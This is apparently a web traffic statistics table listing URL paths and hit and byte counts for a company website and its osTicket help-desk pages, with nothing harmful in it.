/pqr/upload/scp/ajax.php/users/lookup/form 19 37255 0 0
/pqr/upload/scp/ajax.php/users/local 16 1332 0 0
/pqr/upload/scp/ajax.php/form/help-topic/12 14 81247 0 0
/pqr/upload/scp/ajax.php/content/signature/none 14 0 0 0
/residenciales.php 8 38339 3 3
/pqr/upload/scp/index.php 8 30043 2 0
/pqr/upload/scp/ajax.php/draft/ticket.staff 6 216 0 1
/pqr/upload/ 6 12897 1 1
/pqr/upload/scp/ajax.php/list/3/items/33/preview 6 810 0 1
/suspencion.php/sitemap.xml 6 4854 3 3
/medidor.php 3 16493 1 1
/pqr/upload/scp/ajax.php/list/3/items/27/preview 3 369 0 0
/control.php 3 12729 0 0
/pqr/upload/assets/font/fontawesome-webfont.woff 3 130716 0 0
http://proditelsas.com/contactenos.php 2 6144 1 1
/pqr/upload/ajax.php/i18n/es_MX/js 2 5598 0 1
/pqr/upload/logo.php 2 38458 0 0
/corporativo.php 2 16175 1 1
/pqr/upload/scp/ajax.php/users/select/800 1 2420 0 0
/pqr/upload/scp/ajax.php/lock/ticket/1034 1 41 0 0
//contactenos.php 1 3072 1 1
/pqr/upload/scp/ajax.php/users/select/653 1 2387 0 0
/pqr/upload/scp/ajax.php/draft/ticket.staff.note 1 36 0 0
/pqr/upload/scp/ajax.php/lock/999/release 1 21 0 0
/pqr/upload/view.php 1 1514 1 1
/pqr/upload/scp/ajax.php/users/select/788 1 2387 0 0
/factores.php 1 12421 0 0
/head.php 1 747 0 1
/pqr/upload/scp/ajax.php/draft/244 1 22 0 0
/procedimientos.php 1 4876 1 0
/pqr/upload/scp/ajax.php/users/select/750 1 2402 0 0
/pqr/upload/scp/ajax.php/list/3/items/43/preview 2 264 0 0
/pqr/upload/scp/ajax.php/help/tips/tickets.queue 1 1465 0 0
/pqr/upload/scp/ajax.php/list/3/items/46/preview 1 123 0 0
/pqr/upload/index.php 2 3150 0 0
/pqr/upload/scp/ajax.php/tickets/lookup 1 169 0 0
/caracteristicas.php 2 28794 0 0
/contactenos.php/send.php 1 3072 0 1
/pqr/upload/scp/ajax.php/draft/ticket.staff.response 1 36 0 0
/pqr/upload/scp/ajax.php/users/select/644 1 2385 0 0
/pqr/upload/scp/ajax.php/tickets/1042/preview 1 769 0 0
/pqr/upload/scp/ajax.php/users/select/630 2 4793 0 0
/pqr/upload/scp/ajax.php/tickets/1041/preview 1 760 0 1
/pqr/upload/scp/ajax.php/users/select/801 1 2395 0 0
/pqr/upload/scp/ajax.php/draft/245 1 22 0 0
/pqr/upload/scp/ajax.php/draft/249 1 22 0 0
END_SIDER
